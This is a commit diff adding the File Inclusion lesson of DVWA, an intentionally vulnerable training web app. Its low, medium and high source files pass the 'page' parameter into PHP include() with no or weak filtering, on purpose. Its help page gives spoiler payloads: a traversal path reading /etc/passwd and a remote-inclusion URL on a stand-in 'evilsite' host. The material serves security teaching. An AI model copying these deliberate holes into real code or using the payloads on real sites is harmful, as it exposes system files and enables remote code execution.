first commit

2016-12-02 17:19:11 -02:00 · 2016-12-02 17:19:11 -02:00 · f40a84879c
commit f40a84879c
parent 985a5c928c
551 changed files with 72374 additions and 24 deletions
--- a/dvwa/vulnerabilities/fi/file1.php
+++ b/dvwa/vulnerabilities/fi/file1.php
@ -0,0 +1,21 @@
+<?php
+
+$page[ 'body' ] .= "
+<div class=\"body_padded\">
+	<h1>Vulnerability: File Inclusion</h1>
+	<div class=\"vulnerable_code_area\">
+		<h3>File 1</h3>
+		<hr />
+		Hello <em>" . dvwaCurrentUser() . "</em><br />
+		Your IP address is: <em>{$_SERVER[ 'REMOTE_ADDR' ]}</em><br /><br />
+		[<em><a href=\"?page=include.php\">back</a></em>]
+	</div>
+
+	<h2>More info</h2>
+	<ul>
+		<li>" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion' ) . "</li>
+		<li>" . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Top_10_2007-A3' ) . "</li>
+	</ul>
+</div>\n";
+
+?>
--- a/dvwa/vulnerabilities/fi/file2.php
+++ b/dvwa/vulnerabilities/fi/file2.php
@ -0,0 +1,19 @@
+<?php
+
+$page[ 'body' ] .= "
+<div class=\"body_padded\">
+	<h1>Vulnerability: File Inclusion</h1>
+	<div class=\"vulnerable_code_area\">
+		<h3>File 2</h3>
+		<hr />
+		\"<em>I needed a password eight characters long so I picked Snow White and the Seven Dwarves.</em>\" ~ Nick Helm<br /><br />
+		[<em><a href=\"?page=include.php\">back</a></em>]	</div>
+
+	<h2>More info</h2>
+	<ul>
+		<li>" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion' ) . "</li>
+		<li>" . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Top_10_2007-A3' ) . "</li>
+	</ul>
+</div>\n";
+
+?>
--- a/dvwa/vulnerabilities/fi/file3.php
+++ b/dvwa/vulnerabilities/fi/file3.php
@ -0,0 +1,29 @@
+<?php
+
+$page[ 'body' ] .= "
+<div class=\"body_padded\">
+	<h1>Vulnerability: File Inclusion</h1>
+	<div class=\"vulnerable_code_area\">
+		<h3>File 3</h3>
+		<hr />
+		Welcome back <em>" . dvwaCurrentUser() . "</em><br />
+		Your IP address is: <em>";
+if( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER ))
+	$page[ 'body' ] .= $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
+else
+	$page[ 'body' ] .= "**Missing Header**";
+$page[ 'body' ] .= "</em><br />
+		Your user-agent address is: <em>{$_SERVER[ 'HTTP_USER_AGENT' ]}</em><br />
+		You came form: <em>{$_SERVER[ 'HTTP_REFERER' ]}</em><br />
+		I'm hosted at: <em>{$_SERVER[ 'HTTP_HOST' ]}</em><br /><br />
+		[<em><a href=\"?page=include.php\">back</a></em>]
+	</div>
+
+	<h2>More info</h2>
+	<ul>
+		<li>" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion' ) . "</li>
+		<li>" . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Top_10_2007-A3' ) . "</li>
+	</ul>
+</div>\n";
+
+?>
--- a/dvwa/vulnerabilities/fi/file4.php
+++ b/dvwa/vulnerabilities/fi/file4.php
@ -0,0 +1,14 @@
+<?php
+
+$page[ 'body' ] .= "
+<div class=\"body_padded\">
+	<h1>Vulnerability: File Inclusion</h1>
+	<div class=\"vulnerable_code_area\">
+		<h3>File 4 (Hidden)</h3>
+		<hr />
+		Good job!<br />
+		This file isn't listed at all on DVWA. If you are reading this, you did something right ;-)<br />
+		<!-- You did an even better job to see this :-)! -->
+</div>\n";
+
+?>
--- a/dvwa/vulnerabilities/fi/help/help.php
+++ b/dvwa/vulnerabilities/fi/help/help.php
@ -0,0 +1,63 @@
+<div class="body_padded">
+	<h1>Help - File Inclusion</h1>
+
+	<div id="code">
+	<table width='100%' bgcolor='white' style="border:2px #C0C0C0 solid">
+	<tr>
+	<td><div id="code">
+		<h3>About</h3>
+		<p>Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server.
+			At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing
+			the potential for malicious file execution.</p>
+
+		<p>If the file chosen to be included is local on the target machine, it is called "Local File Inclusion (LFI). But files may also be included on other
+			machines, which then the attack is a "Remote File Inclusion (RFI).</p>
+
+		<p>When RFI is not an option. using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect.</p>
+
+		<p>Note, the term "file inclusion" is not the same as "arbitrary file access" or "file disclosure".</p>
+
+		<br /><hr /><br />
+
+		<h3>Objective</h3>
+		<p>Read all five famous quotes from '<a href="../hackable/flags/fi.php">../hackable/flags/fi.php</a>' using only the file inclusion.</p>
+
+		<br /><hr /><br />
+
+		<h3>Low Level</h3>
+		<p>This allows for direct input into <u>one of many PHP functions</u> that will include the content when executing.</p>
+
+		<p>Depending on the web service configuration will depend if RFI is a possibility.</p>
+		<pre>Spoiler: <span class="spoiler">LFI: ?page=../../../../../../etc/passwd</span>.
+			Spoiler: <span class="spoiler">RFI: ?page=http://www.evilsite.com/evil.php</span>.</pre>
+
+		<br />
+
+		<h3>Medium Level</h3>
+		<p>The developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used, isn't enough.</p>
+		<pre>Spoiler: <span class="spoiler">LFI: Possible, due to it only cycling through the pattern matching once</span>.
+			Spoiler: <span class="spoiler">RFI: <?php echo dvwaExternalLinkUrlGet( 'https://secure.php.net/manual/en/wrappers.php', 'PHP Streams' ); ?></span>.</pre>
+
+		<br />
+
+		<h3>High Level</h3>
+		<p>The developer has had enough. They decided to only allow certain files to be used. However as there are multiple files with the same basename,
+			they use a wildcard to include them all.</p>
+		<pre>Spoiler: <span class="spoiler">LFI: The filename only has start with a certain value.</span>.
+			Spoiler: <span class="spoiler">RFI: Need to link in another vulnerability, such as file upload</span>.</pre>
+
+		<br />
+
+		<h3>Impossible Level</h3>
+		<p>The developer calls it quits and hardcodes only the allowed pages, with there exact filenames. By doing this, it removes all avenues of attack.</p>
+	</div></td>
+	</tr>
+	</table>
+
+	</div>
+
+	<br />
+
+	<p>Reference: <?php echo dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Top_10_2007-A3' ); ?></p>
+
+</div>
--- a/dvwa/vulnerabilities/fi/include.php
+++ b/dvwa/vulnerabilities/fi/include.php
@ -0,0 +1,30 @@
+<?php
+
+// Check if the right PHP functions are enabled
+$WarningHtml = '';
+if( !ini_get( 'allow_url_include' ) ) {
+	$WarningHtml .= "<div class=\"warning\">The PHP function <em>allow_url_include</em> is not enabled.</div>";
+}
+if( !ini_get( 'allow_url_fopen' ) ) {
+	$WarningHtml .= "<div class=\"warning\">The PHP function <em>allow_url_fopen</em> is not enabled.</div>";
+}
+
+
+$page[ 'body' ] .= "
+<div class=\"body_padded\">
+	<h1>Vulnerability: File Inclusion</h1>
+
+	{$WarningHtml}
+
+	<div class=\"vulnerable_code_area\">
+		[<em><a href=\"?page=file1.php\">file1.php</a></em>] - [<em><a href=\"?page=file2.php\">file2.php</a></em>] - [<em><a href=\"?page=file3.php\">file3.php</a></em>]
+	</div>
+
+	<h2>More Information</h2>
+	<ul>
+		<li>" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion' ) . "</li>
+		<li>" . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Top_10_2007-A3' ) . "</li>
+	</ul>
+</div>\n";
+
+?>
--- a/dvwa/vulnerabilities/fi/index.php
+++ b/dvwa/vulnerabilities/fi/index.php
@ -0,0 +1,44 @@
+<?php
+
+define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
+require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';
+
+dvwaPageStartup( array( 'authenticated', 'phpids' ) );
+
+$page = dvwaPageNewGrab();
+$page[ 'title' ]   = 'Vulnerability: File Inclusion' . $page[ 'title_separator' ].$page[ 'title' ];
+$page[ 'page_id' ] = 'fi';
+$page[ 'help_button' ]   = 'fi';
+$page[ 'source_button' ] = 'fi';
+
+dvwaDatabaseConnect();
+
+$vulnerabilityFile = '';
+switch( $_COOKIE[ 'security' ] ) {
+	case 'low':
+		$vulnerabilityFile = 'low.php';
+		break;
+	case 'medium':
+		$vulnerabilityFile = 'medium.php';
+		break;
+	case 'high':
+		$vulnerabilityFile = 'high.php';
+		break;
+	default:
+		$vulnerabilityFile = 'impossible.php';
+		break;
+}
+
+require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/fi/source/{$vulnerabilityFile}";
+
+// if( count( $_GET ) )
+if( isset( $file ) )
+	include( $file );
+else {
+	header( 'Location:?page=include.php' );
+	exit;
+}
+
+dvwaHtmlEcho( $page );
+
+?>
--- a/dvwa/vulnerabilities/fi/source/high.php
+++ b/dvwa/vulnerabilities/fi/source/high.php
@ -0,0 +1,13 @@
+<?php
+
+// The page we wish to display
+$file = $_GET[ 'page' ];
+
+// Input validation
+if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
+	// This isn't the page we want!
+	echo "ERROR: File not found!";
+	exit;
+}
+
+?>
--- a/dvwa/vulnerabilities/fi/source/impossible.php
+++ b/dvwa/vulnerabilities/fi/source/impossible.php
@ -0,0 +1,13 @@
+<?php
+
+// The page we wish to display
+$file = $_GET[ 'page' ];
+
+// Only allow include.php or file{1..3}.php
+if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
+	// This isn't the page we want!
+	echo "ERROR: File not found!";
+	exit;
+}
+
+?>
--- a/dvwa/vulnerabilities/fi/source/low.php
+++ b/dvwa/vulnerabilities/fi/source/low.php
@ -0,0 +1,6 @@
+<?php
+
+// The page we wish to display
+$file = $_GET[ 'page' ];
+
+?>
--- a/dvwa/vulnerabilities/fi/source/medium.php
+++ b/dvwa/vulnerabilities/fi/source/medium.php
@ -0,0 +1,10 @@
+<?php
+
+// The page we wish to display
+$file = $_GET[ 'page' ];
+
+// Input validation
+$file = str_replace( array( "http://", "https://" ), "", $file );
+$file = str_replace( array( "../", "..\"" ), "", $file );
+
+?>